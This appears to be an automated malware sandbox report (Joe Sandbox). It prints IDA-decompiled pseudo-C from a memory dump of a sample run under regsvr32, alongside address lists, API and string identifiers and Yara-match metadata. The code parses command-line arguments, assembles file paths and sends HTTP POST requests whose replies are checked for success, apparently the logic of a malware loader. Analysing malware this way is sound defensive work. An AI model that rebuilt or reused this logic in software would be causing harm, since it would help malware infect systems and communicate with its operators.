                                                                                                                                                                        									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E0536A43D(_t193), _a4, _a8);
                                                                                                                                                                        									E05368B9C( &_v16);
                                                                                                                                                                        									__eflags = _a24;
                                                                                                                                                                        									if(_a24 != 0) {
                                                                                                                                                                        										E0536A065(_a24);
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _v8;
                                                                                                                                                                        									if(_v8 != 0) {
                                                                                                                                                                        										L25:
                                                                                                                                                                        										_t122 = 8;
                                                                                                                                                                        										_v24 = _t122;
                                                                                                                                                                        										_v20 = 0;
                                                                                                                                                                        										_v16 = 0;
                                                                                                                                                                        										E05368D6D( &_v20, 0, _t122);
                                                                                                                                                                        										_t127 =  *0x537f838; // 0x0
                                                                                                                                                                        										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                        											_t129 = E05369F6F( &_v20, __eflags);
                                                                                                                                                                        											__eflags = _t129 - 0xc8;
                                                                                                                                                                        											if(_t129 == 0xc8) {
                                                                                                                                                                        												 *_a20 = _t194;
                                                                                                                                                                        												 *_a12 = _t189;
                                                                                                                                                                        												 *_a16 = _t165;
                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                        												return 0;
                                                                                                                                                                        											}
                                                                                                                                                                        											_v12 =  ~_t129;
                                                                                                                                                                        											L29:
                                                                                                                                                                        											_t135 =  *0x537f838; // 0x0
                                                                                                                                                                        											 *((intOrPtr*)(_t135 + 8))(_t194);
                                                                                                                                                                        											_t195 = _v12;
                                                                                                                                                                        											L30:
                                                                                                                                                                        											__eflags = _t165;
                                                                                                                                                                        											if(_t165 != 0) {
                                                                                                                                                                        												_t139 =  *0x537f838; // 0x0
                                                                                                                                                                        												 *((intOrPtr*)(_t139 + 8))(_t165);
                                                                                                                                                                        											}
                                                                                                                                                                        											__eflags = _t189;
                                                                                                                                                                        											if(_t189 != 0) {
                                                                                                                                                                        												_t179 =  *0x537f838; // 0x0
                                                                                                                                                                        												 *((intOrPtr*)(_t179 + 8))(_t189);
                                                                                                                                                                        											}
                                                                                                                                                                        											return _t195;
                                                                                                                                                                        										}
                                                                                                                                                                        										GetLastError();
                                                                                                                                                                        										_v12 = 0xfffffff8;
                                                                                                                                                                        										goto L29;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										GetLastError();
                                                                                                                                                                        										_t143 =  *0x537f838; // 0x0
                                                                                                                                                                        										 *((intOrPtr*)(_t143 + 8))(_t194);
                                                                                                                                                                        										_t145 =  *0x537f838; // 0x0
                                                                                                                                                                        										_v8 = _v8 & 0x00000000;
                                                                                                                                                                        										 *((intOrPtr*)(_t145 + 8))(_t165);
                                                                                                                                                                        										_t147 =  *0x537f838; // 0x0
                                                                                                                                                                        										_t165 = 0;
                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                        										 *((intOrPtr*)(_t147 + 8))(_t189);
                                                                                                                                                                        										_t194 = _v8;
                                                                                                                                                                        										goto L21;
                                                                                                                                                                        									}
                                                                                                                                                                        								} else {
                                                                                                                                                                        									GetLastError();
                                                                                                                                                                        									_t153 =  *0x537f838; // 0x0
                                                                                                                                                                        									 *((intOrPtr*)(_t153 + 8))(_t165);
                                                                                                                                                                        									_t155 =  *0x537f838; // 0x0
                                                                                                                                                                        									_t165 = 0;
                                                                                                                                                                        									 *((intOrPtr*)(_t155 + 8))(_t189);
                                                                                                                                                                        									_t189 = 0;
                                                                                                                                                                        									_t194 = _v8;
                                                                                                                                                                        									goto L22;
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								GetLastError();
                                                                                                                                                                        								_t159 =  *0x537f838; // 0x0
                                                                                                                                                                        								 *((intOrPtr*)(_t159 + 8))(_t189);
                                                                                                                                                                        								L21:
                                                                                                                                                                        								_t189 = 0;
                                                                                                                                                                        								__eflags = 0;
                                                                                                                                                                        								goto L22;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						GetLastError();
                                                                                                                                                                        						L22:
                                                                                                                                                                        						_t186 = _t194;
                                                                                                                                                                        						_t104 = _v12 + 1;
                                                                                                                                                                        						_v12 = _t104;
                                                                                                                                                                        						__eflags = _t104 - 2;
                                                                                                                                                                        					} while (_t104 < 2);
                                                                                                                                                                        					__eflags = _t186;
                                                                                                                                                                        					if(_t186 != 0) {
                                                                                                                                                                        						goto L25;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t195 = 0xfffffffe;
                                                                                                                                                                        					goto L30;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t163 = 0xfffffffc;
                                                                                                                                                                        				return _t163;
                                                                                                                                                                        			}





























































                                                                                                                                                                        0x0536f9fc
                                                                                                                                                                        0x0536f9fc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536f9fc
                                                                                                                                                                        0x0536f8fe
                                                                                                                                                                        0x0536f8bf
                                                                                                                                                                        0x0536f9fe
                                                                                                                                                                        0x0536fa01
                                                                                                                                                                        0x0536fa03
                                                                                                                                                                        0x0536fa06
                                                                                                                                                                        0x0536fa09
                                                                                                                                                                        0x0536fa09
                                                                                                                                                                        0x0536fa12
                                                                                                                                                                        0x0536fa14
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536fa18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536fa18
                                                                                                                                                                        0x0536f88e
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0536F7D7
                                                                                                                                                                        • memset.MSVCRT ref: 0536F7E8
                                                                                                                                                                          • Part of subcall function 05368D6D: memset.MSVCRT ref: 05368D7F
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0536F8BF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ErrorLast
                                                                                                                                                                        • String ID: POST
                                                                                                                                                                        • API String ID: 2570506013-1814004025
                                                                                                                                                                        • Opcode ID: ce7a02bd5fbdeb21926df7fb71247a35e077373415e40d22708fa5ca67a785fd
                                                                                                                                                                        • Instruction ID: 91a8966a6bdff2f34731d0d9c82b3167959b0f97ddce5abaa2aef30c7930ae98
                                                                                                                                                                        • Opcode Fuzzy Hash: ce7a02bd5fbdeb21926df7fb71247a35e077373415e40d22708fa5ca67a785fd
                                                                                                                                                                        • Instruction Fuzzy Hash: 6DA11D75A10218AFDB21DFA4D848AAE7BF9FF48310F108169F905EB258DB749A85CF50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snprintfqsort
                                                                                                                                                                        • String ID: %I64d$false$null$true
                                                                                                                                                                        • API String ID: 756996078-4285102228
                                                                                                                                                                        • Opcode ID: 1b4524e38b7127482f74dc5968423131f72abb0b6c6b348221f033814f74cbe7
                                                                                                                                                                        • Instruction ID: 30d79d63d5230d3079a65a3194a0d116ac3373af98263fa158a9867be4a0b157
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b4524e38b7127482f74dc5968423131f72abb0b6c6b348221f033814f74cbe7
                                                                                                                                                                        • Instruction Fuzzy Hash: 28E17CB3E0020EBBDF359E64CC85EBF7B6AEF04650F008019FD15A6141E679DA61DBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E053650B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                                                                                                                                                        				void _v532;
                                                                                                                                                                        				char _v548;
                                                                                                                                                                        				char _v580;
                                                                                                                                                                        				char _v584;
                                                                                                                                                                        				signed int _v588;
                                                                                                                                                                        				intOrPtr _v592;
                                                                                                                                                                        				WCHAR* _v596;
                                                                                                                                                                        				char _v600;
                                                                                                                                                                        				intOrPtr _v604;
                                                                                                                                                                        				char _v632;
                                                                                                                                                                        				char _v636;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                        				char _t63;
                                                                                                                                                                        				intOrPtr _t65;
                                                                                                                                                                        				intOrPtr _t66;
                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                        				void* _t76;
                                                                                                                                                                        				void* _t77;
                                                                                                                                                                        				signed int _t78;
                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                        				intOrPtr _t82;
                                                                                                                                                                        				WCHAR* _t84;
                                                                                                                                                                        				intOrPtr _t94;
                                                                                                                                                                        				intOrPtr _t95;
                                                                                                                                                                        				void* _t96;
                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                        				signed char _t104;
                                                                                                                                                                        				void* _t107;
                                                                                                                                                                        				intOrPtr _t108;
                                                                                                                                                                        				intOrPtr _t110;
                                                                                                                                                                        				void* _t113;
                                                                                                                                                                        				void* _t114;
                                                                                                                                                                        				WCHAR* _t115;
                                                                                                                                                                        				void* _t126;
                                                                                                                                                                        				WCHAR* _t130;
                                                                                                                                                                        				intOrPtr _t142;
                                                                                                                                                                        				void* _t143;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				signed int _t166;
                                                                                                                                                                        				void* _t167;
                                                                                                                                                                        				void* _t169;
                                                                                                                                                                        				void* _t173;
                                                                                                                                                                        				signed int _t174;
                                                                                                                                                                        				WCHAR* _t176;
                                                                                                                                                                        				signed int _t177;
                                                                                                                                                                        				signed int _t178;
                                                                                                                                                                        				intOrPtr* _t180;
                                                                                                                                                                        				signed int _t182;
                                                                                                                                                                        				void* _t185;
                                                                                                                                                                        				void* _t186;
                                                                                                                                                                        				WCHAR** _t187;
                                                                                                                                                                        				void* _t192;
                                                                                                                                                                        
                                                                                                                                                                        				_t192 = __fp0;
                                                                                                                                                                        				_push(_t177);
                                                                                                                                                                        				_t113 = __edx;
                                                                                                                                                                        				_t173 = __ecx;
                                                                                                                                                                        				_t178 = _t177 | 0xffffffff;
                                                                                                                                                                        				memset( &_v532, 0, 0x20c);
                                                                                                                                                                        				_v588 = _v588 & 0x00000000;
                                                                                                                                                                        				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
                                                                                                                                                                        				_v596 = 1;
                                                                                                                                                                        				if(_t173 != 0) {
                                                                                                                                                                        					_t108 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        					_t5 = _t108 + 0x110; // 0x54716b8
                                                                                                                                                                        					_t110 =  *0x537f820; // 0x546faa0
                                                                                                                                                                        					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *_t5)));
                                                                                                                                                                        				}
                                                                                                                                                                        				if(E0536C9F4(_t173) != 0) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					_t56 = E0536C6CE();
                                                                                                                                                                        					_push(_t113);
                                                                                                                                                                        					_v592 = _t56;
                                                                                                                                                                        					E0536C4C1(_t56,  &_v580, _t190, _t192);
                                                                                                                                                                        					_t114 = E05365072( &_v580,  &_v580, _t190);
                                                                                                                                                                        					_t126 = E0536E2C5( &_v580, E0536A43D( &_v580), 0);
                                                                                                                                                                        					E0536C6E4(_t126,  &_v548, _t192);
                                                                                                                                                                        					_push(_t126);
                                                                                                                                                                        					_t161 =  &_v580;
                                                                                                                                                                        					_t63 = E0536317E(_t173,  &_v580, _t190, _t192);
                                                                                                                                                                        					_v600 = _t63;
                                                                                                                                                                        					if(_t63 != 0) {
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(_t114);
                                                                                                                                                                        						_push(0x537c9a0);
                                                                                                                                                                        						_t115 = E05369A5A(_t63);
                                                                                                                                                                        						_t186 = _t185 + 0x10;
                                                                                                                                                                        						_t65 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
                                                                                                                                                                        						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
                                                                                                                                                                        							L12:
                                                                                                                                                                        							__eflags = _v596;
                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                        								_t66 = E053698BD(_v600);
                                                                                                                                                                        								_t130 = _t115;
                                                                                                                                                                        								 *0x537f8d8 = _t66;
                                                                                                                                                                        								 *0x537f8d0 = E053698BD(_t130);
                                                                                                                                                                        								L17:
                                                                                                                                                                        								_push(_t130);
                                                                                                                                                                        								_t174 = E0536A633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600);
                                                                                                                                                                        								_t187 = _t186 + 0x10;
                                                                                                                                                                        								__eflags = _t174;
                                                                                                                                                                        								if(_t174 == 0) {
                                                                                                                                                                        									goto L41;
                                                                                                                                                                        								}
                                                                                                                                                                        								_push(0x537c9f2);
                                                                                                                                                                        								_t163 = 0xe;
                                                                                                                                                                        								E0536AAA3(_t163, _t192);
                                                                                                                                                                        								E0536AADC(_t174, _t192, _t115);
                                                                                                                                                                        								_t180 = _a4;
                                                                                                                                                                        								_push( *_t180);
                                                                                                                                                                        								E0536AA7E(0xb);
                                                                                                                                                                        								_t165 =  *(_t180 + 0x10);
                                                                                                                                                                        								__eflags =  *(_t180 + 0x10);
                                                                                                                                                                        								if( *(_t180 + 0x10) != 0) {
                                                                                                                                                                        									E0536B025(_t165, _t192);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t166 =  *(_t180 + 0xc);
                                                                                                                                                                        								__eflags = _t166;
                                                                                                                                                                        								if(_t166 != 0) {
                                                                                                                                                                        									E0536B025(_t166, _t192);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t76 = E0536A065(0);
                                                                                                                                                                        								_push(_t166);
                                                                                                                                                                        								_t167 = 2;
                                                                                                                                                                        								_t77 = E0536AA50();
                                                                                                                                                                        								__eflags = _v596;
                                                                                                                                                                        								_t142 = _t76;
                                                                                                                                                                        								if(_v596 == 0) {
                                                                                                                                                                        									_t142 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
                                                                                                                                                                        									if(__eflags != 0) {
                                                                                                                                                                        										_t78 = E05370D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
                                                                                                                                                                        										_t187 =  &(_t187[3]);
                                                                                                                                                                        										goto L26;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t142 = _t142 + 0x228;
                                                                                                                                                                        									goto L25;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t79 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
                                                                                                                                                                        									if(__eflags != 0) {
                                                                                                                                                                        										L32:
                                                                                                                                                                        										__eflags =  *(_t79 + 0x1898) & 0x00000082;
                                                                                                                                                                        										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
                                                                                                                                                                        											_t169 = 0x64;
                                                                                                                                                                        											E0536F0DE(_t169);
                                                                                                                                                                        										}
                                                                                                                                                                        										E0536584B( &_v580, _t192);
                                                                                                                                                                        										_t176 = _a8;
                                                                                                                                                                        										_t143 = _t142;
                                                                                                                                                                        										__eflags = _t176;
                                                                                                                                                                        										if(_t176 != 0) {
                                                                                                                                                                        											_t82 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
                                                                                                                                                                        											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
                                                                                                                                                                        												lstrcpyW(_t176, _t115);
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_t84 = E0536109A(_t143, 0x49f);
                                                                                                                                                                        												_v596 = _t84;
                                                                                                                                                                        												lstrcpyW(_t176, _t84);
                                                                                                                                                                        												E05368BAF( &_v596);
                                                                                                                                                                        												 *_t187 = 0x537c9b0;
                                                                                                                                                                        												lstrcatW(_t176, ??);
                                                                                                                                                                        												lstrcatW(_t176, _t115);
                                                                                                                                                                        												lstrcatW(_t176, 0x537c9b0);
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        										_t81 = _a12;
                                                                                                                                                                        										__eflags = _t81;
                                                                                                                                                                        										if(_t81 != 0) {
                                                                                                                                                                        											 *_t81 = _v592;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t178 = 0;
                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                        										goto L41;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t40 = _t79 + 0x228; // 0x546fe10
                                                                                                                                                                        									_t142 = _t40;
                                                                                                                                                                        									L25:
                                                                                                                                                                        									_t78 = E05365AC0(_t142, _t115, __eflags);
                                                                                                                                                                        									L26:
                                                                                                                                                                        									__eflags = _t78;
                                                                                                                                                                        									if(_t78 >= 0) {
                                                                                                                                                                        										_t79 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        										goto L32;
                                                                                                                                                                        									}
                                                                                                                                                                        									_push(0xfffffffd);
                                                                                                                                                                        									L6:
                                                                                                                                                                        									_pop(_t178);
                                                                                                                                                                        									goto L41;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							_t94 = E0536D11F(_v592, __eflags);
                                                                                                                                                                        							_v600 = _t94;
                                                                                                                                                                        							_t95 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                                                                                                                                                        							__eflags = _t96 - _t178;
                                                                                                                                                                        							if(_t96 != _t178) {
                                                                                                                                                                        								_t97 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        								 *((intOrPtr*)(_t97 + 0x30))();
                                                                                                                                                                        								E05368BF4( &_v636, _t178);
                                                                                                                                                                        								_t130 = _t96;
                                                                                                                                                                        								goto L17;
                                                                                                                                                                        							}
                                                                                                                                                                        							E05368BF4( &_v632, _t178);
                                                                                                                                                                        							_t72 = 1;
                                                                                                                                                                        							goto L42;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t18 = _t65 + 0x1898; // 0x0
                                                                                                                                                                        						_t104 =  *_t18;
                                                                                                                                                                        						__eflags = _t104 & 0x00000004;
                                                                                                                                                                        						if((_t104 & 0x00000004) == 0) {
                                                                                                                                                                        							__eflags = _t104;
                                                                                                                                                                        							if(_t104 != 0) {
                                                                                                                                                                        								goto L12;
                                                                                                                                                                        							}
                                                                                                                                                                        							L11:
                                                                                                                                                                        							E0536F1F6(_v600, _t161);
                                                                                                                                                                        							goto L12;
                                                                                                                                                                        						}
                                                                                                                                                                        						E0536F1B6(_v600,  &_v580);
                                                                                                                                                                        						goto L11;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0xfffffffe);
                                                                                                                                                                        					goto L6;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t107 = E05363097( &_v532, _t178, 0x105);
                                                                                                                                                                        					_t190 = _t107;
                                                                                                                                                                        					if(_t107 == 0) {
                                                                                                                                                                        						L41:
                                                                                                                                                                        						E05365F6F( &_v588);
                                                                                                                                                                        						_t72 = _t178;
                                                                                                                                                                        						L42:
                                                                                                                                                                        						return _t72;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				}
                                                                                                                                                                        			}


























































                                                                                                                                                                        0x05365186
                                                                                                                                                                        0x05365190
                                                                                                                                                                        0x05365192
                                                                                                                                                                        0x05365193
                                                                                                                                                                        0x0536519e
                                                                                                                                                                        0x053651a0
                                                                                                                                                                        0x053651a3
                                                                                                                                                                        0x053651a8
                                                                                                                                                                        0x053651af
                                                                                                                                                                        0x053651d3
                                                                                                                                                                        0x053651d3
                                                                                                                                                                        0x053651d8
                                                                                                                                                                        0x0536523f
                                                                                                                                                                        0x05365244
                                                                                                                                                                        0x05365246
                                                                                                                                                                        0x05365250
                                                                                                                                                                        0x05365255
                                                                                                                                                                        0x05365255
                                                                                                                                                                        0x0536526f
                                                                                                                                                                        0x05365271
                                                                                                                                                                        0x05365274
                                                                                                                                                                        0x05365276
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536527c
                                                                                                                                                                        0x05365283
                                                                                                                                                                        0x05365286
                                                                                                                                                                        0x0536528f
                                                                                                                                                                        0x05365294
                                                                                                                                                                        0x0536529a
                                                                                                                                                                        0x0536529f
                                                                                                                                                                        0x053652a4
                                                                                                                                                                        0x053652a8
                                                                                                                                                                        0x053652aa
                                                                                                                                                                        0x053652ae
                                                                                                                                                                        0x053652ae
                                                                                                                                                                        0x053652b3
                                                                                                                                                                        0x053652b6
                                                                                                                                                                        0x053652b8
                                                                                                                                                                        0x053652bc
                                                                                                                                                                        0x053652bc
                                                                                                                                                                        0x053652c3
                                                                                                                                                                        0x053652c8
                                                                                                                                                                        0x053652cc
                                                                                                                                                                        0x053652cf
                                                                                                                                                                        0x053652d4
                                                                                                                                                                        0x053652da
                                                                                                                                                                        0x053652db
                                                                                                                                                                        0x05365303
                                                                                                                                                                        0x05365309
                                                                                                                                                                        0x05365310
                                                                                                                                                                        0x0536531f
                                                                                                                                                                        0x05365324
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05365324
                                                                                                                                                                        0x05365312
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053652dd
                                                                                                                                                                        0x053652dd
                                                                                                                                                                        0x053652e2
                                                                                                                                                                        0x053652e9
                                                                                                                                                                        0x0536532e
                                                                                                                                                                        0x0536532e
                                                                                                                                                                        0x05365335
                                                                                                                                                                        0x05365339
                                                                                                                                                                        0x0536533a
                                                                                                                                                                        0x0536533a
                                                                                                                                                                        0x05365344
                                                                                                                                                                        0x05365349
                                                                                                                                                                        0x0536534c
                                                                                                                                                                        0x0536534d
                                                                                                                                                                        0x0536534f
                                                                                                                                                                        0x05365351
                                                                                                                                                                        0x05365356
                                                                                                                                                                        0x0536535d
                                                                                                                                                                        0x053653a0
                                                                                                                                                                        0x0536535f
                                                                                                                                                                        0x05365364
                                                                                                                                                                        0x0536536c
                                                                                                                                                                        0x05365370
                                                                                                                                                                        0x0536537b
                                                                                                                                                                        0x05365386
                                                                                                                                                                        0x0536538e
                                                                                                                                                                        0x05365392
                                                                                                                                                                        0x0536539a
                                                                                                                                                                        0x0536539a
                                                                                                                                                                        0x0536535d
                                                                                                                                                                        0x053653a6
                                                                                                                                                                        0x053653a9
                                                                                                                                                                        0x053653ab
                                                                                                                                                                        0x053653b1
                                                                                                                                                                        0x053653b1
                                                                                                                                                                        0x053653b3
                                                                                                                                                                        0x053653b3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053653b3
                                                                                                                                                                        0x053652eb
                                                                                                                                                                        0x053652eb
                                                                                                                                                                        0x053652f1
                                                                                                                                                                        0x053652f3
                                                                                                                                                                        0x053652f8
                                                                                                                                                                        0x053652f8
                                                                                                                                                                        0x053652fa
                                                                                                                                                                        0x05365329
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05365329
                                                                                                                                                                        0x053652fc
                                                                                                                                                                        0x0536518a
                                                                                                                                                                        0x0536518a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536518a
                                                                                                                                                                        0x053652db
                                                                                                                                                                        0x053651de
                                                                                                                                                                        0x053651ec
                                                                                                                                                                        0x053651ff
                                                                                                                                                                        0x05365204
                                                                                                                                                                        0x0536520a
                                                                                                                                                                        0x0536520c
                                                                                                                                                                        0x05365224
                                                                                                                                                                        0x05365229
                                                                                                                                                                        0x05365232
                                                                                                                                                                        0x05365238
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05365238
                                                                                                                                                                        0x05365214
                                                                                                                                                                        0x0536521d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536521d
                                                                                                                                                                        0x053651b1
                                                                                                                                                                        0x053651b1
                                                                                                                                                                        0x053651b7
                                                                                                                                                                        0x053651b9
                                                                                                                                                                        0x053651c6
                                                                                                                                                                        0x053651c8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053651ca
                                                                                                                                                                        0x053651ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053651ce
                                                                                                                                                                        0x053651bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053651bf
                                                                                                                                                                        0x05365188
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05365113
                                                                                                                                                                        0x0536511e
                                                                                                                                                                        0x05365124
                                                                                                                                                                        0x05365126
                                                                                                                                                                        0x053653b5
                                                                                                                                                                        0x053653b9
                                                                                                                                                                        0x053653be
                                                                                                                                                                        0x053653c0
                                                                                                                                                                        0x053653c6
                                                                                                                                                                        0x053653c6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05365126

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1985475764-0
                                                                                                                                                                        • Opcode ID: 555dad9dd58d0fbaf19f5943961e316b02e61fba63909580a35a7c8ebb6042f5
                                                                                                                                                                        • Instruction ID: af7f6aa858d6f26a14843892ba21a5411e06b140137fa08d041d0eefc42e035a
                                                                                                                                                                        • Opcode Fuzzy Hash: 555dad9dd58d0fbaf19f5943961e316b02e61fba63909580a35a7c8ebb6042f5
                                                                                                                                                                        • Instruction Fuzzy Hash: C4810271B04304ABC725EB60E849F7E77EABB85710F54863DF4569B288EFB098058B81
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E0536DE26(WCHAR* __ecx) {
                                                                                                                                                                        				int _v8;
                                                                                                                                                                        				WCHAR* _v12;
                                                                                                                                                                        				WCHAR* _v16;
                                                                                                                                                                        				WCHAR* _v140;
                                                                                                                                                                        				WCHAR* _v144;
                                                                                                                                                                        				short _v664;
                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                        				signed int _t30;
                                                                                                                                                                        				WCHAR* _t36;
                                                                                                                                                                        				int _t40;
                                                                                                                                                                        				signed int _t41;
                                                                                                                                                                        				int _t44;
                                                                                                                                                                        				signed int _t45;
                                                                                                                                                                        				WCHAR* _t49;
                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                        				WCHAR* _t52;
                                                                                                                                                                        				void* _t53;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                        				_t51 = 0;
                                                                                                                                                                        				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                                                                                                                        				_t44 = _v8;
                                                                                                                                                                        				_t41 = 0;
                                                                                                                                                                        				_v12 = _t28;
                                                                                                                                                                        				if(_t44 <= 0) {
                                                                                                                                                                        					L22:
                                                                                                                                                                        					_t29 = _t28 | 0xffffffff;
                                                                                                                                                                        					__eflags = _t29;
                                                                                                                                                                        					return _t29;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L1;
                                                                                                                                                                        				}
                                                                                                                                                                        				do {
                                                                                                                                                                        					L1:
                                                                                                                                                                        					_t49 =  *(_t28 + _t41 * 4);
                                                                                                                                                                        					_t30 =  *_t49 & 0x0000ffff;
                                                                                                                                                                        					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
                                                                                                                                                                        						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
                                                                                                                                                                        						_t40 = lstrlenW(_t49);
                                                                                                                                                                        						_t45 = 0;
                                                                                                                                                                        						if(_t40 <= 0) {
                                                                                                                                                                        							L11:
                                                                                                                                                                        							_t44 = _v8;
                                                                                                                                                                        							_t51 = _t51 + 1;
                                                                                                                                                                        							goto L12;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							goto L8;
                                                                                                                                                                        						}
                                                                                                                                                                        						do {
                                                                                                                                                                        							L8:
                                                                                                                                                                        							if(_t49[_t45] == 0x2c) {
                                                                                                                                                                        								_t49[_t45] = 0;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                        						} while (_t45 < _t40);
                                                                                                                                                                        						goto L11;
                                                                                                                                                                        					}
                                                                                                                                                                        					L12:
                                                                                                                                                                        					_t28 = _v12;
                                                                                                                                                                        					_t41 = _t41 + 1;
